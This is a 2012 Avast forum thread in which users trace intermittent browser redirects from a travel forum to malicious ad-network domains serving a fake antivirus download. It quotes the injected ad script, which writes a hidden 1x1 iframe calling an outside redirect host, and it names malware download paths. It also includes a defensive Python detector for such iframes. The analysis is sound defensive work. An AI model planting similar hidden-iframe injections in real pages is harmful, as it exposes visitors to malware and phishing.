Avast WEBforum
Other => Viruses and worms => Topic started by: AndyH on July 31, 2012, 02:45:21 PM
-
Hi
I am getting constant redirects from hxxp://www.flyertalk.com/forum (only this site)
The redirects are to Polish domains (changing each day - http://support.clean-mx.de/clean-mx/viruses.php?ip=31.210.109.37&sort=first%20desc) with a Turkish IP address (constantly - 31.210.109.37) - the latest http://urlquery.net/report.php?id=108921
Other forum users are getting the same redirect, however it is only happening IE (Firefox/Chrome seem unaffected).
I have scanned the forum with Sucuri SiteCheck/Virus Total/Zscaler, but it is coming up clean each time.
Any thoughts why the redirect is happening?
Thanks
-
Also to add:
This is not happening every time. It is infrequent (say 1 in 10 times).
-
Hi AndyH,
Does the redirect happen immediately or on page-load?
-
Hi AndyH,
Does the redirect happen immediately or on page-load?
Hi
It happens immediately, before the page has time to load.
It happens when you access the site from any way (manually inputting the address/Google search/clicking on a favourite/history).
-
Look at the code here, suspicious?
polonus
-
Hi Polonus,
Given here as a tracking cookie:
hXtp://www.flyertalk.com/forum/technical-issues/991476-waiting-pxl-ibpxl-com.html
@AndyH,
I am unable to replicate the problem.
http://urlquery.net/report.php?id=108970
http://urlquery.net/report.php?id=108993
Or Here:
http://www.unmaskparasites.com/security-report/?page=http%3A//www.flyertalk.com/forum/index.php
Or the return I get with IE:
https://www.virustotal.com/file/7835952352613aea6c69a8768a7567bbd13e16988f93783083419bff7a8c5f31/analysis/1343740830/
Always returns around 85-90,000 bytes.
Nothing Here:
http://zulu.zscaler.com/submission/show/71d7b2d74d2432f132c395aed8f8523d-1343740996
-
Thanks
Yes, none of the usual sites can find where the redirect is coming from, as it's not occurring every time.
Other forums have also experienced the same redirect over the past few days to the same Turkish IP address - hxxp://www.quartertothree.com/game-talk/showthread.php?p=3182083
I guess it is a matter of trying to figure out what both sites have in common?
-
This time (using Firefox), I get a somewhat different return: a popUp() function; however, using the general search, there is no reference to it.
To raise more suspicion, it uses eval to generate it. This could be the cause of redirect.
-
Hi AndyH and !Donovan,
Somehow the issue is related to an outdated osCommerce installation (IP 31.210.109.37 has many domains, where this malware has now been closed).
See sitevet report for that AS: AS Name: RADORE Radore Hosting Telekomunikasyon Hizmetleri San. ve Tic. Ltd. Sti.
IPs allocated: 94464
Blacklisted URLs: 177
Hosts...
...malicious URLs? Yes
...badware? Yes
...Zeus botnet servers? Yes
...Current Events? Yes
Another related site: http://urlquery.net/report.php?id=107502
What is taking place there is a Fake AV attack via performancetesterfail-safety dot pl
This info was mentioned in Norton Safe Web comments, but later removed; I found it via the Google cache data.
Yes, my good friends, sometimes Google is your best friend, like in this case, keeping this info online for polonus.
So WordPress users and users of outdated osCommerce software are under attack,
polonus
-
@!Donovan and @polonus
Thanks - I think we are getting there...
The same infected IP is picked up here - http://urlquery.net/report.php?id=106836
However, I am not so sure what it means exactly.
-
Hi AndyH,
This is being returned from there: hxtp://ispsystem.com/sites/all/modules/views/js/jquery.ui.dialog.patch.js?m80f8m
File size: 1134 bytes, File MD5: 48e77be7c0c6ba44bdef8f3adc2774bb (a patch for jQuery), but that code is benign.
Now the malware being served up from that site:
First there is a malicious request: /yd45hn/al/7deeae50b6b00140/0/download/ HTTP/1.1
Host: pctestersaver dot pl
And the response results in what I mentioned earlier: htxp://pctestersaver.pl/yd45hn/al/7deeae50b6b00140/0/release/new/setup.exe
And bingo 100/100% malicious, see: http://zulu.zscaler.com/submission/show/11168afb1422684c37990b09d8757c21-1343746829
Also detected here: http://www.avgthreatlabs.com/sitereports/domain/pctestersaver.pl
During the last 7 days potentially active threats were detected on the main site of this domain
Site blacklisted in multiple real-time domain blocklists, malware last detected 2012-07-28; the site also infected this domain: monarchmoving dot com,
12 trojans found there, see: http://www.google.com/safebrowsing/diagnostic?site=monarchmoving.com/
infected through: http://www.google.com/safebrowsing/diagnostic?site=wojianfei.net/ and some 202 other sites were infested with this malcode....
This one was from 2 days ago: http://urlquery.net/report.php?id=106836
polonus
-
Hi again polonus/!Donovan
OK, I have tested the site with HTTP Analyzer and avast! disabled to get the full picture when the redirect happens.
As you can see, the redirect is coming from hxxp://adbitserver.com - question is though, where is that in the original forum?
Here is a pic of the HTTP Analyzer http://img24.imageshack.us/img24/3795/httpanalyzer.png - ignore the live.com, that is my hotmail account. Your uploads weren't working as I kept getting a 500 error.
-
Hi AndyH,
As you can see, the redirect is coming from hxxp://adbitserver.com - question is though, where is that in the original forum?
If you would, please navigate to the Header tab and post the contents of the Referer information in your next post.
-
Hi AndyH,
As you can see, the redirect is coming from hxxp://adbitserver.com - question is though, where is that in the original forum?
If you would, please navigate to the Header tab and post the contents of the Referer information in your next post.
(Request-Line):GET /in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX HTTP/1.1
Accept:text/html, application/xhtml+xml, */*
Referer:hxxp://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adbitserver.com
Connection:Keep-Alive
-
I've also attached a copy of the original source code for the site - interestingly the site loaded on my screen a fraction of a sec before the redirect.
-
Looking further at the HTTP Analyzer output, the redirect originates from #3 in the list (adliclick.com):
This is the content response:
document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');
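Added example (not part of any post in this thread): a small Python checker that reproduces the correlation AndyH did by hand above. It parses the ad network's document.write() script for iframes that are 1x1 or hidden, parses the HTTP Analyzer header dump of the follow-up request, and reports a hit only when the hidden iframe's host is the one then requested with the forum as Referer. The script body and headers are constructed from the values quoted in this thread, with hxxp:// restored to http:// so urlparse can handle them.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the injected ad-network script quoted in the thread.
AD_SCRIPT = (
    "document.write('<a href=\"http://hoteldetect.net\" target=\"_blank\">"
    "<img src=\"http://adliclick.com/banners/12175/475737972919972/1.jpg\" "
    "alt=\"\" style=\"border:none\" /></a>');"
    "document.write('<iframe src=\"http://adbitserver.com/in?q="
    "LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX\" frameborder=\"0\" "
    "marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" width=\"1\" "
    "height=\"1\"></iframe>');"
)

# Constructed sample: the follow-up request as HTTP Analyzer dumps it.
REQUEST = """(Request-Line):GET /in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX HTTP/1.1
Accept:text/html, application/xhtml+xml, */*
Referer:http://www.flyertalk.com/forum/
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host:adbitserver.com
Connection:Keep-Alive"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"(\w+)\s*=\s*\"([^\"]*)\"")

def hidden_iframes(script):
    """Return (src_host, attrs) for every iframe that is 1x1/0x0 or display:none."""
    found = []
    for m in IFRAME_RE.finditer(script):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
        hidden = "display:none" in attrs.get("style", "").replace(" ", "")
        if tiny or hidden:
            found.append((urlparse(attrs.get("src", "")).hostname, attrs))
    return found

def parse_request(raw):
    """Parse an HTTP Analyzer-style header dump into (request path, headers dict)."""
    lines = raw.splitlines()
    path = lines[0].split(":", 1)[1].split()[1]   # "(Request-Line):GET /path HTTP/1.1"
    headers = {}
    for line in lines[1:]:
        key, value = line.split(":", 1)
        headers[key.strip().lower()] = value.strip()
    return path, headers

def correlate(script, raw_request, page_host):
    """Flag a hidden off-site iframe whose host is then fetched with the page as Referer."""
    path, headers = parse_request(raw_request)
    ref_host = urlparse(headers.get("referer", "")).hostname
    return [{"iframe_host": host, "path": path, "referer": ref_host}
            for host, _ in hidden_iframes(script)
            if host == headers.get("host") and ref_host == page_host and host != page_host]
```

Running correlate(AD_SCRIPT, REQUEST, "www.flyertalk.com") returns one hit naming adbitserver.com, the same chain the HTTP Analyzer screenshot showed.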
-
Hi AndyH,
This is a PHISH for yahoo as you can see from the external element in this scan: http://zulu.zscaler.com/submission/show/f552c70b095960fbb46e7f029360a2be-1343831094
100/100% malicious! I get
Content after the < /html> tag should be considered suspicious.
38: < !-- w234.fp.bf1.yahoo dot com uncompressed/chunked Wed Aug 1 07:37:16 PDT 2012 -->
See IDS alert here: http://urlquery.net/report.php?id=110442
polonus